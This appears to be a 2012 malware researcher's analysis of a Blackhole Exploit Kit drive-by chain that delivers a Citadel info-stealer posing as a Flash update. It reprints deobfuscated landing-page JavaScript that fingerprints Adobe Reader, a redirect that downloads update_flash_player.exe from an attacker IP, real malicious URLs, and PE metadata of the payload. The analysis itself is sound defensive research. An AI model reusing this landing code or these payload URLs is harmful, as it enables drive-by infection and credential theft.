===========================================
#MalwareMustDie!!!!!!!!!!
INFECTION OF CITADEL WITH BHEK
BHEK IS USING PARAMETER e & f
Exploit Method: AcroPDF.PDF
Payload download Method: Msxml2.XMLHTTP
Payload : Citadel/Trojan Password/InfoStealer
VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
===========
Only VT6/43 !!!!
==========
DrWeb : Trojan.PWS.Stealer.946
Norman : W32/Krypt.GB
McAfee-GW-Edition : PWS-Zbot.gen.aln
McAfee : PWS-Zbot.gen.aln
Fortinet : W32/Kryptik.WDV!tr
Panda : Suspicious file
Summary:
This trojan send the data of infected PC by crypted communication via
HTTP to 108.178.59.34 (See network conn report below)
And also downloading other malwares:
* GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
* GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
----------------------------
Set of infected file:
----------------------------
assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2
index.html.2 ad967ba32c54c59db0f4a947410d96f2
js.js d20a786ec45f68eb56f15a589c566b27
js.js.1 d20a786ec45f68eb56f15a589c566b27
js.js.2 d20a786ec45f68eb56f15a589c566b27
LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457
update_flash_player.exe bb53221e4220466c876dbfad9cede066
PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
===========================================
FULL ANALYSYS / #MalwareMustDie / @unixfreaxjp
===========================================
//Likedin Spam;
http://pastebin.com/raw.php?i=n7rppRJY
#Hint from @Xylit0l < Merci!!!!!!!!
//infected url detected:
...Privately
(LINE 170): Chase Mathis
---------------------------------------
//download PoC
--12:24:18-- http://www.nikecup.net/MSmxYk/index.html
=> `index.html.2'
Resolving www.nikecup.net... 62.149.131.163
Connecting to www.nikecup.net|62.149.131.163|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 422 [text/html]
12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]
--------------------------------
// cat the mess
----------------------------------
// fetch the js.js, noted: referer
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target"http://jbrnh.com/3ZKtSw8d/js.js"
--12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js
=> `js.js'
Resolving alpuyecamorelos.com... 209.62.88.194
Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:30:38 (2.29 MB/s) - `js.js' saved [73/73]
--12:31:06-- http://videorender.com.ar/kSWEngwv/js.js
=> `js.js.1'
Resolving videorender.com.ar... 174.37.144.224
Connecting to videorender.com.ar|174.37.144.224|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]
--12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js
=> `js.js.2'
Resolving jbrnh.com... 184.168.101.248
Connecting to jbrnh.com|184.168.101.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/x-javascript]
12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]
// all same contents↑
-----------------------------
// cat the mess (js.js)
document.location='http://108.178.59.34/links/assure_numb_engineers.php';
----------------------------
// fetch the mess, noted: referer, user agent
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target="http://108.178.59.34/links/assure_numb_engineers.php"
--12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php
=> `assure_numb_engineers.php'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]
----------------------------
// Voila..plugin Detect...in blurp..
if(020==0x10)d=document;
try{(d+"523")()}catch(dsgdsg){a=d[g](gg
s="";
for(i=0;;i++){
window.asd2();
if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1e;
for(i=0;i
--------------------------------------------------------
// deobfs the code
try {
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a)
}
}
, isDefined : function (b){
return typeof b != "undefined"
}
, isArray : function (b){
return (/array/i).test(Object.prototype.toString.call(b))
}
, isFunc : function (b){
return typeof b == "function"
}
, isString : function (b){
return typeof b == "string"
}
, isNum : function (b){
return typeof b == "number"
}
, isStrNum : function (b){
return (typeof b == "string" && (/\d/).test(b))
}
, getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
getNum : function (b, c){
var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
exec(b) : null;
return a ? a[0] : null
}
, compareNums : function (h, f, d){
var e = this , c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)){
if (e.isDefined(d) && d.compareNums){
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length);
a ++ ){
if (g(c[a], 10) > g(b[a], 10)){
return 1
}
if (g(c[a], 10) < g(b[a], 10)){
return - 1
}
}
}
return 0
}
, formatNum : function (b, c){
var d = this , a, e;
if (!d.isStrNum(b)){
return null
}
if (!d.isNum(c)){
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a ++ ){
if (/^(0+)(.+)$/.test(e[a])){
e[a] = RegExp.$2
}
if (a > c ||! (/\d/).test(e[a])){
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
}
, $$hasMimeType : function (a){
return function (c){
if (!a.isIE && c){
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b ++ ){
if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)){
return f
}
}
}
}
return null
}
}
, findNavPlugin : function (l, e, c){
var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
for (f = 0; f < a.length; f ++ ){
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
if (!k ||! (k.test(m) || k.test(b))){
return a[f]
}
}
}
return null
}
, getMimeEnabledPlugin : function (k, m, c){
var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d ++ ){
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)){
if (!g ||! (g.test(l) || g.test(a))){
return f
}
}
}
}
return 0
}
, getPluginFileVersion : function (f, b){
var h = this , e, d, g, a, c =- 1;
if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
return b
}
if (!b){
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a ++ ){
if (c >- 1 && a > c && d[a] != "0"){
return b
}
if (g[a] != d[a]){
if (c ==- 1){
c = a
}
if (d[a] != "0"){
return b
}
}
}
return e
}
, AXO : window.ActiveXObject, getAXO : function (a){
var f = null, d, b = this , c = {
}
;
try {
f = new b.AXO(a)
}
catch (d){
}
return f
}
, convertFuncs : function (f){
var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
for (ain f){
if (b.test(a)){
try {
g = a.slice(2);
if (g.length > 0 &&! f[g]){
f[g] = f[a](f);
deletef[a]
}
}
catch (d){
}
}
}
}
, initObj : function (e, b, d){
var a, c;
if (e){
if (e[b[0]] == 1 || d){
for (a = 0; a < b.length; a = a + 2){
e[b[a]] = b[a + 1]
}
}
for (ain e){
c = e[a];
if (c && c[b[0]] == 1){
this .initObj(c, b)
}
}
}
}
, initScript : function (){
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (fin c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
}
;
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
}
, init : function (d){
var c = this , b, d, a = {
status :- 3, plugin : 0
}
;
if (!c.isString(d)){
return a
}
if (d.length == 1){
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b ||! b.getVersion){
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)){
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
a.status =- 2;
return a
}
a.status = 1;
return a
}
, fPush : function (b, a){
var c = this ;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
])))){
a.push(b)
}
}
, callArray : function (b){
var c = this , a;
if (c.isArray(b)){
for (a = 0; a < b.length; a ++ ){
if (b[a] === null){
return
}
c.call(b[a]);
b[a] = null
}
}
}
, call : function (c){
var b = this , a = b.isArray(c) ? c.length :- 1;
if (a > 0 && b.isFunc(c[0])){
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
}
else {
if (b.isFunc(c)){
c(b)
}
}
}
, getVersionDelimiter : ",", $$getVersion : function (a){
return function (g, d, c){
var e = a.init(g), f, b, h = {
}
;
if (e.status < 0){
return null
}
;
f = e.plugin;
if (f.getVersionDone != 1){
f.getVersion(null, d, c);
if (f.getVersionDone === null){
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
}
, cleanup : function (){
}
, addWinEvent : function (d, c){
var e = this , a = window, b;
if (e.isFunc(c)){
if (a.addEventListener){
a.addEventListener(d, c, false)
}
else {
if (a.attachEvent){
a.attachEvent("on" + d, c)
}
else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
}
, winHandler : function (d, c){
return function (){
d();
if (typeof c == "function"){
c()
}
}
}
, WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
var b = {
}
;
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv){
a.onDoneEmptyDiv()
}
}
, winLoaded : false, $$onWindowLoaded : function (a){
return function (b){
if (a.winLoaded){
a.call(b)
}
else {
a.fPush(b, a.WLfuncs)
}
}
}
, div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
function (){
var d = this , b, h, c, a, f, g;
if (d.div && d.div.childNodes){
for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
c = d.div.childNodes[b];
if (c && c.childNodes){
for (h = c.childNodes.length - 1; h >= 0; h -- ){
g = c.childNodes[h];
try {
c.removeChild(g)
}
catch (f){
}
}
}
if (c){
try {
d.div.removeChild(c)
}
catch (f){
}
}
}
}
if (!d.div){
a = document.getElementById(d.divID);
if (a){
d.div = a
}
}
if (d.div && d.div.parentNode){
try {
d.div.parentNode.removeChild(d.div)
}
catch (f){
}
d.div = null
}
}
, DONEfuncs : [], onDoneEmptyDiv : function (){
var c = this , a, b;
if (!c.winLoaded){
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
return
}
for (ain c){
b = c[a];
if (b && b.funcs){
if (b.OTF == 3){
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a ++ ){
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
}
, getWidth : function (c){
if (c){
var a = c.scrollWidth || c.offsetWidth, b = this ;
if (b.isNum(a)){
return a
}
}
return - 1
}
, getTagStatus : function (m, g, a, b){
var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
g.span, i = c.getWidth(d);
if (!k ||! h ||! d ||! c.getDOMobj(m)){
return - 2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
return 0
}
if (l >= i){
return - 1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
if (!m.winLoaded && c.winLoaded){
return 1
}
if (m.winLoaded && c.isNum(b)){
if (!c.isNum(m.count)){
m.count = b
}
if (b - m.count >= 10){
return 1
}
}
}
}
catch (f){
}
return 0
}
, getDOMobj : function (g, a){
var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
try {
if (b && a){
d.div.focus()
}
}
catch (f){
}
return b ? c.firstChild : null
}
, setStyle : function (b, g){
var f = b.style, a, d, c = this ;
if (f && g){
for (a = 0; a < g.length; a = a + 2){
try {
f[g[a]] = g[a + 1]
}
catch (d){
}
}
}
}
, insertDivInBody : function (a, i){
var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
if (!g){
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
}
catch (h){
}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g){
if (g.firstChild && f.isDefined(g.insertBefore)){
g.insertBefore(a, g.firstChild)
}
else {
g.appendChild(a)
}
if (d){
g.removeChild(d)
}
}
else {
}
}
, insertHTML : function (g, b, h, a, l){
var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
"0px", "visibility", "visible"];
var i =
"outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)){
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)){
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2){
if (/[^\s]/.test(b[o + 1])){
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2){
if (/[^\s]/.test(h[o + 1])){
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
}
else {
q = a
}
if (!k.div){
j = n.getElementById(k.divID);
if (j){
k.div = j
}
else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
+ "px", "verticalAlign", "baseline", "display", "block"]));
if (!j){
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode){
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
}
catch (m){
}
;
try {
k.div.appendChild(p)
}
catch (m){
}
;
return {
span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
}
}
return {
span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
}
}
, Plugins : {
adobereader : {
mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
"PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
{
}
, pluginHasMimeType : function (d, c, f){
var b = this , e = b.$, a;
for (ain d){
if (d[a] && d[a].type && d[a].type == c){
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)){
return 1
}
return 0
}
, getVersion : function (l, j){
var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
if (d.isString(j)){
j = j.replace(/\s/g, "");
if (j){
k = j
}
}
else {
j = null
}
if (d.isDefined(g.INSTALLED[k])){
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE){
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0){
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j){
n = b
}
if (!b && d.hasMimeType(g.mimeType)){
b = d.findNavPlugin(a, 0)
}
if (b){
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1){
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
h = "9"
}
else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
h = "8"
}
}
}
}
}
else {
h = g.version
}
if (!d.isDefined(n)){
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
}
else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c =/=\ s * ([ \ d \ .] + ) / g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
""], "", g))).GetVersions();
for (m = 0; m < 5; m ++ ){
if (c.test(f) && (!h || RegExp.$1 > h)){
h = RegExp.$1
}
}
}
catch (i){
}
g.installed = h ? 1 : (b ? 0 :- 1)
}
if (!g.version){
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
}
, zz : 0
}
}
;
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
}
catch (e){
}
if (typeof pdfver == 'string'){
pdfver = pdfver.split('.')
}
else {
pdfver = [0, 0, 0, 0]
}
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i) - 46).toString(16);
if (k.length == 1)k = "0" + k;
d.push(k);
}
;
return d.join("");
}
end_redirect = function (){
window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
}
;
window.onbeforeunload = function (){
return "";
}
;
document.write('');
setTimeout(end_redirect, 60000);
------------------------------------
// infection analysis per exploit & PluginDetect hint..
===================
EXPLOIT-ED BY:
===================
// , Plugins : {
// adobereader : {
// mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
// "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
===================
DOWNLOADED VIA:
===================
// var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
// "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
// "Scripting.Dictionary", "wmplayer.ocx"];
// for (f = 0; f < j.length; f ++ ){
// if (c.getAXO(j[f])){
// c.ActiveXEnabled = true;
// break
*********** Please be noted parameter = var f, j *****************
===================
TO URL:
===================
// end_redirect = function (){
// window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
//
--------------download PoC------------------------------------------------
--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://108.178.59.34/links/assure_numb_engineers.php"
--target="http://108.178.59.34/adobe/update_flash_player.exe"
--12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe
=> `update_flash_player.exe'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150,616 (147K) [application/octet-stream]
12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD
---------------INFECTION CROSS REFERENCE AUTOMATION------------------
[2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
-----------------------------
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
Bin:
//Pic:
// faking windoz app:
UninitializedDataSize....: 0
InitializedDataSize......: 23040
ImageVersion.............: 0.0
ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
FileVersionNumber........: 5.0.2137.1
LanguageCode.............: English (U.S.)
FileFlagsMask............: 0x003f
FileDescription..........: Windows TaskManager
CharacterSet.............: Unicode
LinkerVersion............: 2.5
FileOS...................: Windows NT 32-bit
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 5.00.2137.1
TimeStamp................: 2012:10:17 04:29:46+01:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............: taskmgr
ProductVersion...........: 5.00.2137.1
SubsystemVersion.........: 4.0
OSVersion................: 4.0
OriginalFilename.........: taskmgr.exe
LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............: Microsoft Corporation
CodeSize.................: 108032
FileSubtype..............: 0
ProductVersionNumber.....: 5.0.2137.1
EntryPoint...............: 0x1ef0
ObjectFileType...........: Executable application
//Sigcheck
publisher................: Microsoft Corporation
product..................: Microsoft(R) Windows (R) 2000 Operating System
internal name............: taskmgr
copyright................: Copyright (C) Microsoft Corp. 1991-1999
original name............: taskmgr.exe
file version.............: 5.00.2137.1
description..............: Windows TaskManager
.text 4096 107728 108032 7.49 7bb7c23fbff31a0f4dc8c2082f47d453
.data 114688 13048 12800 1.62 bfd92f96b4b275e9bdc8941a0ac85831
.rsrc 131072 8368 8704 3.36 210a8ec34d58b64a2531c59aa8344586
.reloc 143360 516 1024 3.94 1841b4a61bd8a2498e642d7a36c6d596
Compiled by: Borland Delphi 3.0
Compile Time: 2012-10-17 12:29:46
Packed entropy: Entropy 7.48782313568
Name: .text
Misc: 0x1A4D0
Misc_PhysicalAddress: 0x1A4D0
Misc_VirtualSize: 0x1A4D0
VirtualAddress: 0x1000
SizeOfRawData: 0x1A600
PointerToRawData: 0x400
PointerToRelocations: 0x0
PointerToLinenumbers: 0x0
NumberOfRelocations: 0x0
NumberOfLinenumbers: 0x0
Characteristics: 0x60000020
LangID: 040904B0
LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
InternalName: taskmgr
FileVersion: 5.00.2137.1
CompanyName: Microsoft Corporation
ProductName: Microsoft(R) Windows (R) 2000 Operating System
ProductVersion: 5.00.2137.1
FileDescription: Windows TaskManager
OriginalFilename: taskmgr.exe
------------------
imported calls DLL
-------------------
0041EA0C GetCPInfo KERNEL32
0041EA10 VirtualAlloc KERNEL32
0041EA14 LoadLibraryA KERNEL32
0041EA18 GetProcAddress KERNEL32
0041EA1C GetWindowsDirectoryW KERNEL32
0041EA20 lstrcatW KERNEL32
0041EA24 CreateFileW KERNEL32
0041EA2C LoadIconA USER32
0041EA30 CreateIconIndirect USER32
0041EA34 GetDlgCtrlID USER32
0041EA38 GetScrollPos USER32
0041EA3C RegisterDeviceNotificationA USER32
0041EA40 DdeEnableCallback USER32
0041EA44 DrawStateA USER32
0041EA48 MessageBoxIndirectW USER32
0041EA4C LoadMenuA USER32
0041EA50 GetTabbedTextExtentA USER32
0041EA54 UnpackDDElParam USER32
0041EA58 DialogBoxIndirectParamW USER32
0041EA5C ToAsciiEx USER32
0041EA60 IsWindow USER32
0041EA64 LoadKeyboardLayoutA USER32
0041EA68 GetCursor USER32
0041EA6C UserHandleGrantAccess USER32
0041EA70 GetMenuState USER32
0041EA74 SetMenuItemInfoA USER32
0041EA78 TabbedTextOutW USER32
0041EA7C mouse_event USER32
